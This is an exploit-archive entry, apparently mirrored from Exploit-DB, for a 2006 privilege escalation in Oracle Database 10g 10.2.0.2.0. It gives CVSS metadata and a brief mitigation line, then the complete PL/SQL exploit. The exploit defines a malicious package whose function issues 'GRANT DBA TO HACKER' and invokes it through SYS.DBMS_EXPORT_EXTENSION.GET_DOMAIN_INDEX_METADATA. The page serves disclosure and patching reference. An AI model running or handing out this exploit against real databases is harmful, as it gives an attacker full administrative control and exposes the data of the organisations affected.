header-logo
Suggest Exploit
vendor:
Oracle Database
by:
N1V1Hd $3c41r3
9
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: Oracle Database
Affected Version From: 10.2.0.2.0
Affected Version To: 10.2.0.2.0
Patch Exists: YES
Related CWE: N/A
CPE: oracle:oracle_database:10.2.0.2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Oracle 10g 10.2.0.2.0 Exploit

This exploit grants DBA privileges to the hacker by exploiting a vulnerability in the Oracle 10g 10.2.0.2.0 database. The exploit uses the SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA function to execute a malicious code which grants DBA privileges to the hacker.

Mitigation:

Oracle recommends that customers apply the latest Critical Patch Update (CPU) as it contains fixes for security vulnerabilities. Additionally, customers should apply the latest Patch Set Update (PSU) as it contains a superset of all fixes from the latest CPU.
Source

Exploit-DB raw data:

/* 0day, description is wrong. /str0ke */

/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/

CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
COMMIT;
RETURN(1);
END;

END;
/

DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER';
TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER';
VERSION := '10.2.0.2.0'; GMFLAGS := 1;

v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
=> TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
NEWBLOCK, GMFLAGS => GMFLAGS
);
END;
/

// milw0rm.com [2006-04-26]

Navigation

Suggest Exploit

Services By CQR